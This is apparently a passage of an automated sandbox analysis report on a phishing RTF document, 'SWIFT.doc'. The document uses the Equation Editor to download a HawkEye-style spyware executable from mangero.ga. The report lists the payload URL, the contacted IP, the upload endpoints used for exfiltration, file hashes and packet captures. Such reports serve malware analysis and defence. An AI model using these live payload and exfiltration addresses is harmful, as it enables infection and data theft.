https://a.pomf.cat/	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pomf.cat/upload.php&https://a.pomf.cat/	izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://wellformedweb.org/CommentAPI/	izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://dyn.com/dns/	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false		high
http://pomf.cat/upload.php	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	hktestfile[1].scr.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	hktestfile[1].scr.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iis.fhg.de/audioPA	izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll	izux978537.scr, 00000009.00000002.2375869139.0000000002B31000.00000004.00000001.sdmp, izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	hktestfile[1].scr.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://computername/printers/printername/.printer	izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.nirsoft.net/	vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp	false		high
http://treyresearch.net	izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://bot.whatismyipaddress.com/	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false		high
https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll;HawkEye	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pomf.cat/upload.phpCContent-Disposition:	izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
46.173.221.33	unknown	Russian Federation		56364	GPI-ASRU	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	330287
Start date:	14.12.2020
Start time:	17:48:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 9s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SWIFT.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winDOC@13/9@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 97.1% (good quality ratio 94.3%) Quality average: 85.8% Quality standard deviation: 23%
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe TCP Packets have been reduced to 100 Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:49:41	API Interceptor	298x Sleep call for process: EQNEDT32.EXE modified
17:49:47	API Interceptor	501x Sleep call for process: izux978537.scr modified
17:50:51	API Interceptor	15x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
46.173.221.33	purchase request sheet.doc	Get hash	malicious	Browse	mangero.ga/cax/cax.exe
	order list.doc	Get hash	malicious	Browse	mangero.ga/fortyseven/fortyseven.scr
	PMA1911003.doc	Get hash	malicious	Browse	mangero.ga/kingtroupx/kingtroupx.scr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mangero.ga	purchase request sheet.doc	Get hash	malicious	Browse	46.173.221.33
	order list.doc	Get hash	malicious	Browse	46.173.221.33
	PMA1911003.doc	Get hash	malicious	Browse	46.173.221.33

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GPI-ASRU	purchase request sheet.doc	Get hash	malicious	Browse	46.173.221.33
	order list.doc	Get hash	malicious	Browse	46.173.221.33
	PMA1911003.doc	Get hash	malicious	Browse	46.173.221.33
	290453721.xls	Get hash	malicious	Browse	46.173.210.8
	290453721.xls	Get hash	malicious	Browse	46.173.210.8

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	7447752
Entropy (8bit):	5.138250665474018
Encrypted:	false
SSDEEP:	98304:eUYsXqrhgjzKQYaqTvH6nn0GRj27SchULsKSNiT3I0jibPQMpG:FqrwaPQj2hawI
MD5:	7DA4F5E17791A774131C3C97538A2495
SHA1:	552B4A357B259935A35B06D040D7F2E3205C8E42
SHA-256:	AC8EF770D70DA42EA56D5B15FB5DB0BE89AE9250AC78B2BFD493843A50399A19
SHA-512:	4C0460E29457F9910F5EBB4090FBAF1E29D28E4D2ABB5F63DBE83061CDB306E0C545DB97662F6A380E438D615AD3B9F43EEC8D7B1F9B57EECFF63EF45557CE7B
Malicious:	true
Reputation:	low
IE Cache URL:	http://mangero.ga/izux/hktestfile.scr
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..................q...........q.. ....q...@.. ........................q......ur...@...................................q.W.....................q.......q...................................................... ............... ..H............text.....q.. ....q................. ..`.reloc........q.......q.............@..B.........................................................q.....H.........q............................................................... .........90...(....9........r.Z.p....(....(............(........f.... ...._ ...... ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... @..._ @.....J.... ...._ ............(....:....(%...s-.............(..........(....:....(&...s-.............(.....(....v(#...9....(.... ......* ....*.0..wnp..... .........% .....M.% .....Z.% .... .....% ..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A2D0E25-5575-4F65-9737-3BA52E43A74D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A3DB071-4F03-4D2B-8CA3-F1ADB9722678}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11988
Entropy (8bit):	3.522915830051191
Encrypted:	false
SSDEEP:	192:MGZWrNfluRdIp0ALuyIPWAepVVYrz9Q+gyf2Sj7g+u4OzM1kj:wrHuep0ryI0YPBP7HOzM1kj
MD5:	ED4C38D3EA4025C9BBA22A2C89D7245E
SHA1:	8500C4BB1AAB0B521D3854C9556F9714FCA54318
SHA-256:	63512F967A20556F2D9FF59393F676A3FE6E1FA0724FB63A794F7AF7D650F276
SHA-512:	71AD1150886AF517F39C05358A4E8701074E4C0B45D1C02993341498FFE9904FEBB12D3D5168A33C12A4C8F1D7C4F3E7816CE7357293BF90C4C9B0CE717AF658
Malicious:	false
Reputation:	low
Preview:	!.^.&.!.+.@.=.-.~.1.=.5.~.<...@.2....#.).[._.).>.?.]...[.6.4.\|.?.?.7.-.&.%.;.0.?.0.?.-.(.3.-.=.'.&.).>._.'.....9.^.?.?.8.-.@.?.5.@.[.?.%.7.?.;.6./.@.>._.4.\|.>.'.<.#.<.#.;.9.?..\|.,.'.-.?.1.%././...`.(.~.2.=.-.?.?.].=.?.7./.,.[.~.#.0.$.>.3..?.7.+...<.-...^.(.`.-.5.5.7.~.;.$.].3.4.3.4.:..6.%.?.!.$.^.?.'.#.?.1.9.[.`.#.5.2.6.=...).>.2./.../.?.?....%.-.=.(.`.@.%.9.].>.?.._.?.4...?.=.;._.,.8.#.(....;.'.'.?.9.$.6.?.9.-.?.#.2.^.9.9.^.=.<.#.3.%.(.1.$.;.&.).:._..:.%.2.>.].6...3.)._.1.2.3.$.?.!..%.8.?.).1.!.6.?.$.`.`./..._.?.$.\|.&.[.@.=.-.5.>.-.9.5.9.-.:.,.?...&.`.@.%.\|...=.?.(.7.9.1...?.^.?.#.8.?.6...$.?.?.?.%.(.5.?.-.).&.5.\|.7.1./.7.[.<.?...\|.\|.$.#...`..2.;.%.7.=.].\|.$.6._.9.].?.9.?.].#.7.*.0.[.+.=.5.4.2.:.#.~...4.2.,.1.!.(...?.?.?.7._.^.?.(.?.3.`.].9.@.`.>.(.9.&.'.%.$.[.2.@.?.+.,.2.&...5.8.0.:.!.?.?.%.5.6.5.8.#.8.-.7.6.@.@...[.;.9.%.\|.$.4.?.3.;.`.\|.(.2.`...#.&.?.(.1.+...3.3.2.8...[._.&.0.[.).<.$./.6.%.?.?.0...2.?.0.?.?.`.%.<...\|.`.[.\|...`.!.\|.'.%.~.~.?.&.+.=.[./.].?.?.9.=.?.#.6.2.<./.

C:\Users\user\AppData\Local\Temp\73f52833-e0b3-84b4-f8d3-07db0b3195f9 Download File
Process:	C:\Users\user\AppData\Roaming\izux978537.scr
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	5.140319531114784
Encrypted:	false
SSDEEP:	3:91sdUBmRhys8m0uR1rrn:9eW4ys30m1
MD5:	AB986688BB63AF782CAD2D87A92C93E3
SHA1:	BDBF286D59A4B7898A17C52D17DBF2172163F35B
SHA-256:	A2B606F440BD3248A432F75747507B5A59AD1C9D5327A1A6ED6131BB9CC409AC
SHA-512:	C0DE1198EB7E0674E97E1A0770E0E394CCCC19A16B9E01B1C104AB762D78016DB5C87A478C33B87616C7D3F5D095535833497E66A2A1E84BCF12B2FED25B4748
Malicious:	false
Reputation:	low
Preview:	6y8lxPKPPBIW+1duQx+1udgc8YpqENDI4Dt1IzqCDU/R9S7AL35y919NiQAPRZsN

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SWIFT.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Dec 15 00:49:39 2020, length=1258700, window=hide
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.547116102220396
Encrypted:	false
SSDEEP:	48:80H/XT0jFHGRacojuQh20H/XT0jFHGRacojuQ/:8C/XojFmRhojuQh2C/XojFmRhojuQ/
MD5:	7457FB8646A6423F665D4F8C08B7849B
SHA1:	386D33E660A47241A3FA2F8263191D39EE2E0095
SHA-256:	EF16F973ED95215D10FBADA35945668E8D2B7DB488E62939AF84D1492BBB086C
SHA-512:	B5D18028524682730B15FA397CFE6B43A5713F458E891C2094E30358D39754B50467BE859A71709968072F6C8A4EE7859F37B050D008E4B2E4E4B3FBF8CA3BD5
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...[.v..{..[.v..{..~'.......4...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..4...Q4. .SWIFT.doc.@.......Q.y.Q.y...8.....................S.W.I.F.T...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop\SWIFT.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.W.I.F.T...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.114278124890147
Encrypted:	false
SSDEEP:	3:M1GZFSurNFSmX1GZFSv:MQ7Lvo7c
MD5:	9731EEE3C0A02AE27F1EE87C1F8D6715
SHA1:	4D5D69FD84A1DE2FB2865C456E57F5C27CEDA3CE
SHA-256:	90AE3C9111B4FB7EBD7F273088FB110C401DA00E07382D2B1D7BD181F436E49B
SHA-512:	5F603970D5A7310A737F6A9E8FF7DA8445C0533F87716EC65B9557268D23ACF7001F112E4F809C1957FEEA1D6D482997BB55C7D5ABD13E5E4B68C925662922FD
Malicious:	false
Reputation:	low
Preview:	[doc]..SWIFT.LNK=0..SWIFT.LNK=0..[doc]..SWIFT.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\izux978537.scr Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	7447752
Entropy (8bit):	5.138250665474018
Encrypted:	false
SSDEEP:	98304:eUYsXqrhgjzKQYaqTvH6nn0GRj27SchULsKSNiT3I0jibPQMpG:FqrwaPQj2hawI
MD5:	7DA4F5E17791A774131C3C97538A2495
SHA1:	552B4A357B259935A35B06D040D7F2E3205C8E42
SHA-256:	AC8EF770D70DA42EA56D5B15FB5DB0BE89AE9250AC78B2BFD493843A50399A19
SHA-512:	4C0460E29457F9910F5EBB4090FBAF1E29D28E4D2ABB5F63DBE83061CDB306E0C545DB97662F6A380E438D615AD3B9F43EEC8D7B1F9B57EECFF63EF45557CE7B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..................q...........q.. ....q...@.. ........................q......ur...@...................................q.W.....................q.......q...................................................... ............... ..H............text.....q.. ....q................. ..`.reloc........q.......q.............@..B.........................................................q.....H.........q............................................................... .........90...(....9........r.Z.p....(....(............(........f.... ...._ ...... ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... ...._ ......J.... @..._ @.....J.... ...._ ............(....:....(%...s-.............(..........(....:....(&...s-.............(.....(....v(#...9....(.... ......* ....*.0..wnp..... .........% .....M.% .....Z.% .... .....% ..

C:\Users\user\Desktop\~$SWIFT.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, version 1, unknown character set
Entropy (8bit):	4.036745127605034
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SWIFT.doc
File size:	1258700
MD5:	516028d299e8b6b9f947fdb4541a5d7e
SHA1:	fa9c3d41dcd61c1dcade0ba7943882cf640a71cd
SHA256:	6de5a6a916916823583495dae424fa8ce2f54c33f2a67da83337b6f2579e816c
SHA512:	63d59833ee33c2d743a5b7d95eebd6b1bc28b814253ce4f6cd53441eb0e5e3ecf1053cdf13a421a2eb5d0b1463f5b1a9c188f8ff6470ced7741c9362ac433022
SSDEEP:	24576:Np4EYWj0t4t9F97XxYJBfzroFtjC+o4hZkRklMTqHr0ke:s
File Content Preview:	{\rtf107!^&!+@=-~1=5~<.@2.#)[_)>?].[64\|??7-&%;0?0?-(3-='&)>_'..9^??8-@?5@[?%7?;6/@>_4\|>'<#<#;9?\|,'-?1%//.`(~2=-??]=?7/,[~#0$>3?7+.<-.^(`-557~;$]3434:6%?!$^?'#?19[`#526=.)>2/./??.%-=(`@%9]>?_?4.?=;_,8#(.;''?9$6?9-?#2^99^=<#3%(1$;&):_:%2>]6.3)_123$?

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001568h	2	embedded	EqUatIOn.3	626454				no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2020 17:49:33.579776049 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.630593061 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.630748987 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.631094933 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.681514025 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682003975 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682048082 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682086945 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682126045 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682163000 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682202101 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682212114 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682255030 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682260990 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682265997 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682271004 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682462931 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682504892 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682543039 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682543993 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682580948 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682586908 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.682620049 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.682658911 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.687187910 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732657909 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732722044 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732760906 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732808113 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732810020 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732834101 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732839108 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732853889 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732856989 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732902050 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.732904911 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.732954979 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733072042 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733114958 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733122110 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733160973 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733184099 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733222961 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733232975 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733261108 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733270884 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733306885 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733309031 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733361959 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733555079 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733572960 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733596087 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733603954 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733640909 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733644962 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733690023 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733694077 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733740091 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733882904 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.733932018 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.733983040 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.734025002 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.734029055 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.734062910 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.734067917 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.734107971 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.734731913 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.782946110 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783004045 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783129930 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783188105 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783471107 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783514977 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783551931 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783555984 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783567905 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783595085 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783627033 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783633947 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783647060 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783674002 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.783698082 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.783721924 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784116983 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784158945 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784189939 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784190893 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784209967 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784229994 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784251928 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784292936 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784425020 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784487963 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784501076 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784562111 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784575939 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784615993 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784637928 CET	49167	80	192.168.2.22	46.173.221.33
Dec 14, 2020 17:49:33.784663916 CET	80	49167	46.173.221.33	192.168.2.22
Dec 14, 2020 17:49:33.784665108 CET	49167	80	192.168.2.22	46.173.221.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2020 17:49:33.486143112 CET	52197	53	192.168.2.22	8.8.8.8
Dec 14, 2020 17:49:33.569056988 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 14, 2020 17:49:33.486143112 CET	192.168.2.22	8.8.8.8	0xc229	Standard query (0)	mangero.ga	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 14, 2020 17:49:33.569056988 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	mangero.ga		46.173.221.33	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mangero.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
